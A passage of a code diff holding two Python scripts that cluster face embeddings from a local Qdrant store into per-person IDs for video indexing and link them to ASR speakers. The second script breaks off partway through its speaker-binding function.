#!/opt/homebrew/bin/python3.11
|
||||
"""
|
||||
Face Clustering Processor V2 - Cluster by trace_id
|
||||
Strategy:
|
||||
1. Group faces by trace_id
|
||||
2. Compute average embedding per trace
|
||||
3. Cluster traces (not individual faces)
|
||||
4. Assign person_id to all faces in each trace
|
||||
"""
|
||||
|
||||
import json
|
||||
import numpy as np
|
||||
import os
|
||||
import sys
|
||||
from collections import defaultdict
|
||||
from sklearn.cluster import AgglomerativeClustering
|
||||
|
||||
sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)))
|
||||
|
||||
UUID = os.getenv("UUID", "quick_preview")
|
||||
OUTPUT_DIR = os.getenv("MOMENTRY_OUTPUT_DIR", "./output")
|
||||
FACE_JSON_PATH = os.path.join(OUTPUT_DIR, f"{UUID}.face.json")
|
||||
if not os.path.exists(FACE_JSON_PATH):
|
||||
FACE_JSON_PATH = os.path.join(OUTPUT_DIR, UUID, f"{UUID}.face.json")
|
||||
OUTPUT_JSON_PATH = os.path.join(OUTPUT_DIR, f"{UUID}.face_clustered.json")
|
||||
ASRX_JSON_PATH = os.path.join(OUTPUT_DIR, f"{UUID}.asrx.json")
|
||||
|
||||
|
||||
def get_embeddings_from_qdrant(file_uuid):
|
||||
"""Get all face embeddings from Qdrant grouped by trace_id"""
|
||||
import requests
|
||||
|
||||
qdrant_url = os.environ.get("QDRANT_URL", "http://localhost:6333")
|
||||
qdrant_api_key = os.environ.get("QDRANT_API_KEY", "")
|
||||
|
||||
headers = {}
|
||||
if qdrant_api_key:
|
||||
headers["api-key"] = qdrant_api_key
|
||||
|
||||
# Scroll through all points
|
||||
all_points = []
|
||||
offset = None
|
||||
|
||||
while True:
|
||||
payload = {
|
||||
"filter": {
|
||||
"must": [
|
||||
{"key": "file_uuid", "match": {"value": file_uuid}}
|
||||
]
|
||||
},
|
||||
"limit": 1000,
|
||||
"with_vector": True
|
||||
}
|
||||
if offset:
|
||||
payload["offset"] = offset
|
||||
|
||||
response = requests.post(
|
||||
f"{qdrant_url}/collections/_faces/points/scroll",
|
||||
json=payload,
|
||||
headers=headers
|
||||
)
|
||||
|
||||
if response.status_code != 200:
|
||||
print(f"Qdrant error: {response.status_code}")
|
||||
break
|
||||
|
||||
result = response.json().get("result", {})
|
||||
points = result.get("points", [])
|
||||
|
||||
if not points:
|
||||
break
|
||||
|
||||
all_points.extend(points)
|
||||
offset = result.get("next_page_offset")
|
||||
|
||||
if not offset:
|
||||
break
|
||||
|
||||
if len(all_points) % 5000 == 0:
|
||||
print(f" Loaded {len(all_points)} points...")
|
||||
|
||||
print(f"[QDRANT] Loaded {len(all_points)} face embeddings")
|
||||
return all_points
|
||||
|
||||
|
||||
def cluster_by_trace(points, min_faces_per_trace=2, confidence_threshold=0.5):
|
||||
"""
|
||||
Cluster faces by trace_id:
|
||||
1. Filter low-confidence faces
|
||||
2. Group by trace_id
|
||||
3. Compute weighted average embedding per trace
|
||||
4. Cluster traces
|
||||
"""
|
||||
# Filter by confidence
|
||||
high_conf_points = [
|
||||
p for p in points
|
||||
if p.get("payload", {}).get("confidence", 0) >= confidence_threshold
|
||||
]
|
||||
print(f"[FILTER] {len(high_conf_points)}/{len(points)} faces pass confidence >= {confidence_threshold}")
|
||||
|
||||
# Group by trace_id
|
||||
traces = defaultdict(list)
|
||||
for point in high_conf_points:
|
||||
payload = point.get("payload", {})
|
||||
trace_id = payload.get("trace_id")
|
||||
if trace_id is not None and trace_id >= 0:
|
||||
traces[trace_id].append(point)
|
||||
|
||||
print(f"[TRACE] Found {len(traces)} unique traces")
|
||||
|
||||
# Compute average embedding per trace
|
||||
trace_embeddings = {}
|
||||
for trace_id, trace_points in traces.items():
|
||||
if len(trace_points) < min_faces_per_trace:
|
||||
continue
|
||||
|
||||
# Weighted average by confidence
|
||||
embeddings = []
|
||||
weights = []
|
||||
for p in trace_points:
|
||||
embeddings.append(p["vector"])
|
||||
weights.append(p.get("payload", {}).get("confidence", 1.0))
|
||||
|
||||
embeddings = np.array(embeddings)
|
||||
weights = np.array(weights)
|
||||
weights = weights / weights.sum()
|
||||
|
||||
avg_embedding = np.average(embeddings, axis=0, weights=weights)
|
||||
trace_embeddings[trace_id] = {
|
||||
"embedding": avg_embedding,
|
||||
"face_count": len(trace_points),
|
||||
"avg_confidence": float(np.mean(weights)),
|
||||
"frames": [p.get("payload", {}).get("frame") for p in trace_points]
|
||||
}
|
||||
|
||||
print(f"[TRACE] {len(trace_embeddings)} traces with >= {min_faces_per_trace} faces")
|
||||
|
||||
return trace_embeddings, traces
|
||||
|
||||
|
||||
def main():
|
||||
if not os.path.exists(FACE_JSON_PATH):
|
||||
print(f"❌ Face JSON not found: {FACE_JSON_PATH}")
|
||||
return
|
||||
|
||||
# Load face.json for frame structure
|
||||
with open(FACE_JSON_PATH) as f:
|
||||
face_data = json.load(f)
|
||||
|
||||
frames_list = face_data.get("frames", [])
|
||||
if not frames_list:
|
||||
print("❌ No frames in JSON")
|
||||
return
|
||||
|
||||
# Get embeddings from Qdrant
|
||||
print(f"[FACE_CLUSTER_V2] Loading embeddings for {UUID}...")
|
||||
points = get_embeddings_from_qdrant(UUID)
|
||||
|
||||
if not points:
|
||||
print("❌ No embeddings found")
|
||||
return
|
||||
|
||||
# Cluster by trace_id
|
||||
trace_embeddings, traces = cluster_by_trace(
|
||||
points,
|
||||
min_faces_per_trace=1, # Minimum 1 face per trace
|
||||
confidence_threshold=0.5
|
||||
)
|
||||
|
||||
if not trace_embeddings:
|
||||
print("❌ No valid traces found")
|
||||
return
|
||||
|
||||
# Prepare embeddings for clustering
|
||||
trace_ids = list(trace_embeddings.keys())
|
||||
embeddings = np.array([trace_embeddings[tid]["embedding"] for tid in trace_ids])
|
||||
|
||||
# Cluster traces
|
||||
print(f"[CLUSTER] Clustering {len(trace_ids)} traces...")
|
||||
|
||||
# Use Agglomerative with cosine distance
|
||||
# Distance threshold 0.35 for tighter clustering
|
||||
clustering = AgglomerativeClustering(
|
||||
n_clusters=None,
|
||||
distance_threshold=0.35, # Tighter threshold for traces
|
||||
metric="cosine",
|
||||
linkage="average"
|
||||
)
|
||||
labels = clustering.fit_predict(embeddings)
|
||||
|
||||
# Map trace_id -> person_id
|
||||
unique_labels = set(labels)
|
||||
label_to_person = {l: f"Person_{i}" for i, l in enumerate(unique_labels)}
|
||||
|
||||
print(f"[CLUSTER] Detected {len(unique_labels)} unique persons")
|
||||
|
||||
# Create trace -> person mapping
|
||||
trace_to_person = {}
|
||||
for i, trace_id in enumerate(trace_ids):
|
||||
trace_to_person[trace_id] = label_to_person[labels[i]]
|
||||
|
||||
# Build frame-level output
|
||||
output_frames = []
|
||||
fps_value = face_data.get("fps", 23.98)
|
||||
|
||||
for frame_idx, frame_obj in enumerate(frames_list):
|
||||
frame_num = frame_obj.get("frame", frame_idx)
|
||||
timestamp = frame_obj.get("timestamp", frame_num / fps_value if fps_value > 0 else 0)
|
||||
faces = frame_obj.get("faces", [])
|
||||
|
||||
output_faces = []
|
||||
for face_idx, face in enumerate(faces):
|
||||
# Find matching point from Qdrant
|
||||
face_x = face.get("x", 0)
|
||||
face_y = face.get("y", 0)
|
||||
|
||||
# Find trace_id for this face
|
||||
matched_trace_id = None
|
||||
for p in points:
|
||||
payload = p.get("payload", {})
|
||||
if payload.get("frame") == frame_num:
|
||||
bbox = payload.get("bbox", {})
|
||||
if abs(bbox.get("x", 0) - face_x) < 50 and abs(bbox.get("y", 0) - face_y) < 50:
|
||||
matched_trace_id = payload.get("trace_id")
|
||||
break
|
||||
|
||||
if matched_trace_id is not None and matched_trace_id in trace_to_person:
|
||||
person_id = trace_to_person[matched_trace_id]
|
||||
output_faces.append({
|
||||
"face_id": f"face_{frame_idx}_{face_idx}",
|
||||
"cluster_id": person_id,
|
||||
"confidence": face.get("confidence", 0.9),
|
||||
"trace_id": matched_trace_id
|
||||
})
|
||||
|
||||
if output_faces:
|
||||
output_frames.append({
|
||||
"frame": frame_num,
|
||||
"timestamp": timestamp,
|
||||
"faces": output_faces
|
||||
})
|
||||
|
||||
# Build cluster summary
|
||||
clusters = []
|
||||
for label in unique_labels:
|
||||
person_id = label_to_person[label]
|
||||
trace_count = sum(1 for l in labels if l == label)
|
||||
face_count = sum(
|
||||
trace_embeddings[trace_ids[i]]["face_count"]
|
||||
for i, l in enumerate(labels) if l == label
|
||||
)
|
||||
clusters.append({
|
||||
"cluster_id": person_id,
|
||||
"trace_count": trace_count,
|
||||
"face_count": face_count,
|
||||
"representative_face": None
|
||||
})
|
||||
|
||||
# Save output
|
||||
output_data = {
|
||||
"clusters": clusters,
|
||||
"frames": output_frames
|
||||
}
|
||||
|
||||
with open(OUTPUT_JSON_PATH, "w", encoding="utf-8") as f:
|
||||
json.dump(output_data, f, indent=2, ensure_ascii=False)
|
||||
|
||||
print(f"[OUTPUT] Saved to {OUTPUT_JSON_PATH}")
|
||||
print(f" - {len(clusters)} persons")
|
||||
print(f" - {len(output_frames)} frames")
|
||||
|
||||
# Print cluster distribution
|
||||
for c in sorted(clusters, key=lambda x: x["face_count"], reverse=True)[:5]:
|
||||
print(f" - {c['cluster_id']}: {c['trace_count']} traces, {c['face_count']} faces")
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
@@ -0,0 +1,563 @@
|
||||
#!/opt/homebrew/bin/python3.11
|
||||
"""
|
||||
Face Clustering Processor — Multi-stage trace-based deduplication
|
||||
|
||||
Flow:
|
||||
1. Load all face embeddings from Qdrant _faces collection
|
||||
2. Aggregate by trace_id -> mean embedding + frame range per trace
|
||||
3. Stage 1: AgglomerativeClustering on trace means (strict threshold 0.35)
|
||||
4. Stage 2: Merge compatible clusters (temporal overlap guard, threshold_dist 0.25)
|
||||
5. Assign person_id back to individual faces via trace_id
|
||||
6. Output face_cluster.json with auto speaker binding
|
||||
|
||||
Output format (unchanged):
|
||||
{"status", "file_uuid", "clusters": [{cluster_id, face_count, representative_face}], "frames": [{frame, timestamp, faces: [{face_id, cluster_id, confidence}]}]}
|
||||
"""
|
||||
|
||||
import json
|
||||
import numpy as np
|
||||
import os
|
||||
import sys
|
||||
import argparse
|
||||
import psycopg2
|
||||
from collections import defaultdict
|
||||
from sklearn.cluster import AgglomerativeClustering
|
||||
|
||||
sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)))
|
||||
from redis_publisher import RedisPublisher
|
||||
|
||||
UUID = os.getenv("UUID", "quick_preview")
|
||||
OUTPUT_DIR = os.getenv("MOMENTRY_OUTPUT_DIR", "./output")
|
||||
OUTPUT_JSON_PATH = os.path.join(OUTPUT_DIR, f"{UUID}.face_clustered.json")
|
||||
ASRX_JSON_PATH = os.path.join(OUTPUT_DIR, f"{UUID}.asrx.json")
|
||||
DB_URL = os.getenv("DATABASE_URL", "postgresql://accusys@localhost:5432/momentry")
|
||||
|
||||
STAGE1_THRESHOLD = 0.35
|
||||
|
||||
|
||||
def write_empty_output(status: str, file_uuid: str, output_path: str):
|
||||
output_data = {
|
||||
"status": status,
|
||||
"file_uuid": file_uuid,
|
||||
"clusters": [],
|
||||
"frames": []
|
||||
}
|
||||
with open(output_path, "w", encoding="utf-8") as f:
|
||||
json.dump(output_data, f, indent=2, ensure_ascii=False)
|
||||
print(f"Wrote empty output ({status}) to {output_path}")
|
||||
|
||||
|
||||
def load_qdrant_faces(uuid: str, publisher: RedisPublisher) -> list:
|
||||
"""Load all face points (payload + vector) from Qdrant _faces for a file."""
|
||||
publisher.progress("face_cluster", 0, 100, "Loading embeddings from Qdrant")
|
||||
try:
|
||||
import requests
|
||||
qdrant_url = os.environ.get("QDRANT_URL", "http://localhost:6333")
|
||||
qdrant_api_key = os.environ.get("QDRANT_API_KEY", "Test3200Test3200Test3200")
|
||||
headers = {}
|
||||
if qdrant_api_key:
|
||||
headers["api-key"] = qdrant_api_key
|
||||
|
||||
all_points = []
|
||||
offset = None
|
||||
while True:
|
||||
body = {
|
||||
"limit": 10000,
|
||||
"with_payload": True,
|
||||
"with_vector": True,
|
||||
"filter": {
|
||||
"must": [
|
||||
{"key": "file_uuid", "match": {"value": uuid}}
|
||||
]
|
||||
}
|
||||
}
|
||||
if offset:
|
||||
body["offset"] = offset
|
||||
|
||||
resp = requests.post(
|
||||
f"{qdrant_url}/collections/_faces/points/scroll",
|
||||
json=body,
|
||||
headers=headers,
|
||||
timeout=60
|
||||
)
|
||||
if resp.status_code != 200:
|
||||
print(f"Qdrant scroll error: {resp.status_code}")
|
||||
break
|
||||
|
||||
data = resp.json()
|
||||
batch = data.get("result", {}).get("points", [])
|
||||
all_points.extend(batch)
|
||||
next_offset = data.get("result", {}).get("next_page_offset")
|
||||
if not next_offset:
|
||||
break
|
||||
offset = next_offset
|
||||
|
||||
print(f"Loaded {len(all_points)} points from Qdrant _faces")
|
||||
return all_points
|
||||
except Exception as e:
|
||||
print(f"Failed to load embeddings from Qdrant: {e}")
|
||||
return []
|
||||
|
||||
|
||||
def aggregate_by_trace(points: list) -> dict:
|
||||
"""Group Qdrant points by trace_id.
|
||||
|
||||
Returns:
|
||||
{trace_id: {'embeddings': ndarray, 'count': int, 'frame_min': int, 'frame_max': int}}
|
||||
"""
|
||||
traces = defaultdict(lambda: {"embeddings": [], "frame_min": float("inf"), "frame_max": -1, "face_refs": []})
|
||||
|
||||
for point in points:
|
||||
payload = point.get("payload", {})
|
||||
vector = point.get("vector")
|
||||
if vector is None:
|
||||
continue
|
||||
|
||||
trace_id = payload.get("trace_id", -1)
|
||||
frame = payload.get("frame", 0)
|
||||
|
||||
t = traces[trace_id]
|
||||
t["embeddings"].append(vector)
|
||||
if frame < t["frame_min"]:
|
||||
t["frame_min"] = frame
|
||||
if frame > t["frame_max"]:
|
||||
t["frame_max"] = frame
|
||||
|
||||
result = {}
|
||||
for trace_id, t in traces.items():
|
||||
emb = np.array(t["embeddings"])
|
||||
result[trace_id] = {
|
||||
"embeddings": emb,
|
||||
"count": len(emb),
|
||||
"frame_min": t["frame_min"],
|
||||
"frame_max": t["frame_max"],
|
||||
}
|
||||
|
||||
print(f" Aggregated {len(points)} faces into {len(result)} traces")
|
||||
single_count = sum(1 for t in result.values() if t["count"] == 1)
|
||||
print(f" Single-face traces: {single_count} ({single_count/len(result)*100:.0f}% of {len(result)})")
|
||||
return result
|
||||
|
||||
|
||||
def compute_trace_means(traces: dict) -> dict:
|
||||
"""Normalize each trace's embeddings and compute mean vector.
|
||||
|
||||
Returns:
|
||||
{trace_id: {'mean': ndarray(512,), 'frame_min': int, 'frame_max': int}}
|
||||
"""
|
||||
trace_data = {}
|
||||
for trace_id, t in traces.items():
|
||||
emb = t["embeddings"]
|
||||
norms = np.linalg.norm(emb, axis=1, keepdims=True)
|
||||
norms[norms == 0] = 1
|
||||
emb_norm = emb / norms
|
||||
mean_vec = np.mean(emb_norm, axis=0)
|
||||
mean_vec = mean_vec / np.linalg.norm(mean_vec)
|
||||
|
||||
trace_data[trace_id] = {
|
||||
"mean": mean_vec,
|
||||
"count": t["count"],
|
||||
"frame_min": t["frame_min"],
|
||||
"frame_max": t["frame_max"],
|
||||
}
|
||||
return trace_data
|
||||
|
||||
|
||||
def trace_level_clustering(trace_data: dict) -> dict:
|
||||
"""Two-stage clustering on trace-level mean embeddings.
|
||||
|
||||
Stage 1: Strict AgglomerativeClustering (cosine, threshold=STAGE1_THRESHOLD)
|
||||
Stage 2: Merge clusters whose centroids are within STAGE2_MERGE_DIST
|
||||
and whose frame ranges do NOT overlap (temporal guard).
|
||||
|
||||
Returns:
|
||||
{trace_id: person_label (int)}
|
||||
"""
|
||||
trace_ids = sorted(trace_data.keys())
|
||||
n_traces = len(trace_ids)
|
||||
if n_traces == 0:
|
||||
return {}
|
||||
if n_traces == 1:
|
||||
return {trace_ids[0]: 0}
|
||||
|
||||
means = np.array([trace_data[t]["mean"] for t in trace_ids])
|
||||
frames = [(trace_data[t]["frame_min"], trace_data[t]["frame_max"]) for t in trace_ids]
|
||||
|
||||
# Stage 1: strict AgglomerativeClustering on trace means
|
||||
print(f" Stage 1: clustering {n_traces} traces (threshold={STAGE1_THRESHOLD})...")
|
||||
clustering = AgglomerativeClustering(
|
||||
n_clusters=None, distance_threshold=STAGE1_THRESHOLD,
|
||||
metric="cosine", linkage="average"
|
||||
)
|
||||
stage1_labels = clustering.fit_predict(means)
|
||||
|
||||
n_stage1 = len(set(stage1_labels))
|
||||
print(f" Stage 1 result: {n_stage1} clusters")
|
||||
|
||||
if n_stage1 <= 1:
|
||||
# Nothing to merge
|
||||
return {t: l for t, l in zip(trace_ids, stage1_labels)}
|
||||
|
||||
# Compute trace info per Stage 1 cluster
|
||||
cluster_info = defaultdict(lambda: {"trace_ids": [], "means": [], "frame_min": float("inf"), "frame_max": -1})
|
||||
for t, label in zip(trace_ids, stage1_labels):
|
||||
ci = cluster_info[label]
|
||||
ci["trace_ids"].append(t)
|
||||
ci["means"].append(trace_data[t]["mean"])
|
||||
if trace_data[t]["frame_min"] < ci["frame_min"]:
|
||||
ci["frame_min"] = trace_data[t]["frame_min"]
|
||||
if trace_data[t]["frame_max"] > ci["frame_max"]:
|
||||
ci["frame_max"] = trace_data[t]["frame_max"]
|
||||
|
||||
cluster_labels = sorted(cluster_info.keys())
|
||||
n_clusters = len(cluster_labels)
|
||||
|
||||
# Stage 2: trace-pair voting merge
|
||||
# For each pair of clusters, count cross-trace high-similarity pairs.
|
||||
# If enough traces match AND frame ranges don't overlap -> merge.
|
||||
MATCH_SIM = 0.70
|
||||
MATCH_RATIO = 0.30
|
||||
|
||||
merge_map = {cl: cl for cl in cluster_labels}
|
||||
merged = set()
|
||||
|
||||
# Pre-compute normalized trace means for efficient dot-product
|
||||
trace_mean_arr = np.array([trace_data[t]["mean"] for t in trace_ids])
|
||||
trace_index = {t: i for i, t in enumerate(trace_ids)}
|
||||
|
||||
for i, cl_a in enumerate(cluster_labels):
|
||||
if cl_a in merged:
|
||||
continue
|
||||
ci_a = cluster_info[cl_a]
|
||||
ids_a = ci_a["trace_ids"]
|
||||
for j, cl_b in enumerate(cluster_labels):
|
||||
if j <= i:
|
||||
continue
|
||||
if cl_b in merged:
|
||||
continue
|
||||
ci_b = cluster_info[cl_b]
|
||||
ids_b = ci_b["trace_ids"]
|
||||
|
||||
# Compute pairwise similarity between traces in A and B
|
||||
idx_a = [trace_index[t] for t in ids_a]
|
||||
idx_b = [trace_index[t] for t in ids_b]
|
||||
sim_block = trace_mean_arr[idx_a] @ trace_mean_arr[idx_b].T # |A| x |B|
|
||||
|
||||
high_sim_pairs = np.sum(sim_block > MATCH_SIM)
|
||||
min_size = min(len(ids_a), len(ids_b))
|
||||
match_rate = high_sim_pairs / min_size if min_size > 0 else 0
|
||||
|
||||
if match_rate < MATCH_RATIO:
|
||||
continue
|
||||
|
||||
# Temporal overlap check
|
||||
r_a = (ci_a["frame_min"], ci_a["frame_max"])
|
||||
r_b = (ci_b["frame_min"], ci_b["frame_max"])
|
||||
overlap = max(0, min(r_a[1], r_b[1]) - max(r_a[0], r_b[0]))
|
||||
if overlap > 0:
|
||||
continue
|
||||
|
||||
merge_map[cl_b] = cl_a
|
||||
merged.add(cl_b)
|
||||
# Merge cluster info (for subsequent pair checks)
|
||||
ci_a["trace_ids"].extend(ci_b["trace_ids"])
|
||||
ci_a["means"].extend(ci_b["means"])
|
||||
ci_a["frame_min"] = min(ci_a["frame_min"], ci_b["frame_min"])
|
||||
ci_a["frame_max"] = max(ci_a["frame_max"], ci_b["frame_max"])
|
||||
|
||||
n_merged = n_clusters - len(merged)
|
||||
print(f" Stage 2: merged {len(merged)} clusters -> {n_merged} final clusters")
|
||||
|
||||
# Build final label mapping: trace_id -> final cluster label
|
||||
# Re-map to sequential Person_0..Person_N
|
||||
final_cluster_ids = {}
|
||||
next_label = 0
|
||||
for cl in cluster_labels:
|
||||
root = merge_map[cl]
|
||||
if root not in final_cluster_ids:
|
||||
final_cluster_ids[root] = next_label
|
||||
next_label += 1
|
||||
|
||||
trace_to_person = {}
|
||||
for t, label in zip(trace_ids, stage1_labels):
|
||||
root = merge_map[label]
|
||||
trace_to_person[t] = final_cluster_ids[root]
|
||||
|
||||
return trace_to_person
|
||||
|
||||
|
||||
def main():
|
||||
global OUTPUT_JSON_PATH, UUID
|
||||
|
||||
parser = argparse.ArgumentParser(description="Face Clustering Processor")
|
||||
parser.add_argument("video_path", help="Path to video file")
|
||||
parser.add_argument("output_path", help="Path to output JSON file")
|
||||
parser.add_argument("--uuid", help="Video UUID (optional, overrides env var)")
|
||||
parser.add_argument("--force", action="store_true", help="Overwrite existing output")
|
||||
parser.add_argument("--frames", type=str, default=None, help=argparse.SUPPRESS)
|
||||
args = parser.parse_args()
|
||||
|
||||
OUTPUT_JSON_PATH = args.output_path
|
||||
output_dir = os.path.dirname(args.output_path)
|
||||
if args.uuid:
|
||||
uuid = args.uuid
|
||||
else:
|
||||
uuid = os.path.basename(args.video_path).rsplit(".", 1)[0]
|
||||
UUID = uuid
|
||||
|
||||
face_json_path = os.path.join(output_dir, f"{uuid}.face.json")
|
||||
if not os.path.exists(face_json_path):
|
||||
face_json_path = os.path.join(output_dir, uuid, f"{uuid}.face.json")
|
||||
|
||||
publisher = RedisPublisher(uuid)
|
||||
publisher.info("face_cluster", "Face clustering started")
|
||||
|
||||
if not os.path.exists(face_json_path):
|
||||
print("Face JSON not found.")
|
||||
write_empty_output("no_face_json", uuid, OUTPUT_JSON_PATH)
|
||||
publisher.complete("face_cluster", "No face.json found")
|
||||
return
|
||||
|
||||
with open(face_json_path) as f:
|
||||
face_data = json.load(f)
|
||||
|
||||
frames_list = face_data.get("frames", [])
|
||||
if not frames_list:
|
||||
print("No frames in JSON (no faces).")
|
||||
write_empty_output("no_faces", uuid, OUTPUT_JSON_PATH)
|
||||
publisher.complete("face_cluster", "No faces to cluster")
|
||||
return
|
||||
|
||||
fps_value = face_data.get("fps", 23.98)
|
||||
|
||||
# Step 1: Load all Qdrant _faces points
|
||||
points = load_qdrant_faces(uuid, publisher)
|
||||
if not points:
|
||||
print("No embeddings found in Qdrant.")
|
||||
write_empty_output("no_embeddings", uuid, OUTPUT_JSON_PATH)
|
||||
publisher.complete("face_cluster", "No embeddings in Qdrant")
|
||||
return
|
||||
|
||||
publisher.progress("face_cluster", 10, 100, f"Loaded {len(points)} Qdrant points")
|
||||
|
||||
# Step 2: Aggregate by trace_id
|
||||
traces = aggregate_by_trace(points)
|
||||
if not traces:
|
||||
print("No valid traces found.")
|
||||
write_empty_output("no_embeddings", uuid, OUTPUT_JSON_PATH)
|
||||
publisher.complete("face_cluster", "No valid traces")
|
||||
return
|
||||
|
||||
publisher.progress("face_cluster", 20, 100, f"Aggregated {len(traces)} traces")
|
||||
|
||||
# Step 3: Compute trace-level mean embeddings
|
||||
trace_data = compute_trace_means(traces)
|
||||
publisher.progress("face_cluster", 30, 100, "Computing trace means")
|
||||
|
||||
# Step 4: Two-stage trace-level clustering
|
||||
trace_to_person = trace_level_clustering(trace_data)
|
||||
if not trace_to_person:
|
||||
print("Clustering produced no results.")
|
||||
write_empty_output("no_embeddings", uuid, OUTPUT_JSON_PATH)
|
||||
publisher.complete("face_cluster", "Clustering empty")
|
||||
return
|
||||
|
||||
n_persons = len(set(trace_to_person.values()))
|
||||
print(f"Clustering result: {n_persons} persons ({len(trace_to_person)} traces)")
|
||||
|
||||
# Step 5: Build trace_id -> face detection mapping from Qdrant payload
|
||||
# For each face.json frame+face, find matching Qdrant point via trace_id
|
||||
# Build a map: trace_id -> list of (frame_idx, face_idx) references
|
||||
trace_to_face_refs = defaultdict(list)
|
||||
qdrant_by_frame_trace = {}
|
||||
for point in points:
|
||||
payload = point.get("payload", {})
|
||||
frame = payload.get("frame")
|
||||
trace_id = payload.get("trace_id", -1)
|
||||
bbox = payload.get("bbox", {})
|
||||
if frame is not None and trace_id >= 0:
|
||||
cx = bbox.get("x", 0) + bbox.get("width", 0) // 2
|
||||
cy = bbox.get("y", 0) + bbox.get("height", 0) // 2
|
||||
key = (frame, cx, cy)
|
||||
qdrant_by_frame_trace[key] = trace_id
|
||||
|
||||
# Match face.json frames to trace_ids using (frame, bbox_center)
|
||||
matched_count = 0
|
||||
for frame_idx, frame_obj in enumerate(frames_list):
|
||||
frame_num = frame_obj.get("frame", frame_idx)
|
||||
for face_idx, face in enumerate(frame_obj.get("faces", [])):
|
||||
x = face.get("x", 0)
|
||||
y = face.get("y", 0)
|
||||
w = face.get("width", 0)
|
||||
h = face.get("height", 0)
|
||||
cx = x + w // 2
|
||||
cy = y + h // 2
|
||||
key = (frame_num, cx, cy)
|
||||
|
||||
trace_id = qdrant_by_frame_trace.get(key)
|
||||
if trace_id is None:
|
||||
# Approximate match (within 50px)
|
||||
for (qf, qx, qy), tid in qdrant_by_frame_trace.items():
|
||||
if qf == frame_num and abs(qx - cx) < 50 and abs(qy - cy) < 50:
|
||||
trace_id = tid
|
||||
break
|
||||
|
||||
if trace_id is not None and trace_id in trace_to_person:
|
||||
person_label = trace_to_person[trace_id]
|
||||
face["person_id"] = f"Person_{person_label}"
|
||||
matched_count += 1
|
||||
|
||||
print(f" Assigned person_id to {matched_count} faces")
|
||||
if matched_count == 0:
|
||||
print("No faces matched to any trace - check Qdrant data integrity")
|
||||
publisher.progress("face_cluster", 100, 100, "No trace matches")
|
||||
write_empty_output("no_faces", uuid, OUTPUT_JSON_PATH)
|
||||
return
|
||||
|
||||
# Step 6: Build clusters list (same format as before)
|
||||
# Count faces per person_label
|
||||
person_face_count = defaultdict(int)
|
||||
person_best_face = {}
|
||||
for frame_idx, frame_obj in enumerate(frames_list):
|
||||
for face_idx, face in enumerate(frame_obj.get("faces", [])):
|
||||
person_id = face.get("person_id")
|
||||
if not person_id:
|
||||
continue
|
||||
person_face_count[person_id] += 1
|
||||
confidence = face.get("confidence", 0.9)
|
||||
if person_id not in person_best_face or confidence > person_best_face[person_id]["confidence"]:
|
||||
person_best_face[person_id] = {
|
||||
"face_id": f"face_{frame_idx}_{face_idx}",
|
||||
"confidence": confidence,
|
||||
"frame": frame_obj.get("frame", frame_idx),
|
||||
"bbox": {"x": face.get("x"), "y": face.get("y"), "width": face.get("width"), "height": face.get("height")}
|
||||
}
|
||||
|
||||
person_labels_sorted = sorted(person_face_count.keys(), key=lambda p: -person_face_count[p])
|
||||
clusters = []
|
||||
for person_id in person_labels_sorted:
|
||||
cluster_entry = {
|
||||
"cluster_id": person_id,
|
||||
"face_count": person_face_count[person_id],
|
||||
"representative_face": person_best_face.get(person_id)
|
||||
}
|
||||
clusters.append(cluster_entry)
|
||||
|
||||
# Build output frames (same format)
|
||||
output_frames = []
|
||||
for frame_idx, frame_obj in enumerate(frames_list):
|
||||
timestamp = frame_obj.get("timestamp",
|
||||
frame_obj.get("frame", 0) / fps_value if fps_value > 0 else 0)
|
||||
output_faces = []
|
||||
for face_idx, face in enumerate(frame_obj.get("faces", [])):
|
||||
person_id = face.get("person_id")
|
||||
if person_id:
|
||||
output_faces.append({
|
||||
"face_id": f"face_{frame_idx}_{face_idx}",
|
||||
"cluster_id": person_id,
|
||||
"confidence": face.get("confidence", 0.9),
|
||||
})
|
||||
if output_faces:
|
||||
output_frames.append({
|
||||
"frame": frame_obj.get("frame", frame_idx),
|
||||
"timestamp": timestamp,
|
||||
"faces": output_faces,
|
||||
})
|
||||
|
||||
# Save output
|
||||
output_data = {
|
||||
"status": "has_faces",
|
||||
"file_uuid": UUID,
|
||||
"clusters": clusters,
|
||||
"frames": output_frames,
|
||||
}
|
||||
with open(OUTPUT_JSON_PATH, "w", encoding="utf-8") as f:
|
||||
json.dump(output_data, f, indent=2, ensure_ascii=False)
|
||||
print(f"Saved clustered data to {OUTPUT_JSON_PATH}")
|
||||
publisher.complete("face_cluster", f"{len(clusters)} clusters")
|
||||
|
||||
# Step 7: Auto-bind speakers
|
||||
auto_bind_speakers()
|
||||
|
||||
|
||||
def auto_bind_speakers():
|
||||
if not os.path.exists(OUTPUT_JSON_PATH) or not os.path.exists(ASRX_JSON_PATH):
|
||||
print("Missing data for speaker binding.")
|
||||
return
|
||||
|
||||
with open(OUTPUT_JSON_PATH) as f:
|
||||
face_clustered = json.load(f)
|
||||
with open(ASRX_JSON_PATH) as f:
|
||||
asrx_data = json.load(f)
|
||||
|
||||
print("Auto-binding Speakers to Persons...")
|
||||
|
||||
face_spans = []
|
||||
for frame_obj in face_clustered.get("frames", []):
|
||||
ts = frame_obj.get("timestamp")
|
||||
for face in frame_obj.get("faces", []):
|
||||
person_id = face.get("cluster_id")
|
||||
if person_id and ts is not None:
|
||||
face_spans.append({"ts": ts, "person_id": person_id})
|
||||
|
||||
speaker_person_counts = {}
|
||||
|
||||
for seg in asrx_data.get("segments", []):
|
||||
start = seg.get("start")
|
||||
end = seg.get("end")
|
||||
speaker = seg.get("speaker_id")
|
||||
if not speaker or start is None or end is None:
|
||||
continue
|
||||
candidates = [f for f in face_spans if f.get("ts") is not None and start <= f["ts"] <= end]
|
||||
if candidates:
|
||||
person_counts = {}
|
||||
for c in candidates:
|
||||
pid = c["person_id"]
|
||||
person_counts[pid] = person_counts.get(pid, 0) + 1
|
||||
if speaker not in speaker_person_counts:
|
||||
speaker_person_counts[speaker] = {}
|
||||
best_person = max(person_counts, key=person_counts.get)
|
||||
speaker_person_counts[speaker][best_person] = (
|
||||
speaker_person_counts[speaker].get(best_person, 0) + 1
|
||||
)
|
||||
|
||||
try:
|
||||
conn = psycopg2.connect(DB_URL)
|
||||
cur = conn.cursor()
|
||||
for speaker, persons in speaker_person_counts.items():
|
||||
if not persons:
|
||||
continue
|
||||
best_person = max(persons, key=persons.get)
|
||||
print(f" {speaker} is likely {best_person} ({persons[best_person]} votes)")
|
||||
|
||||
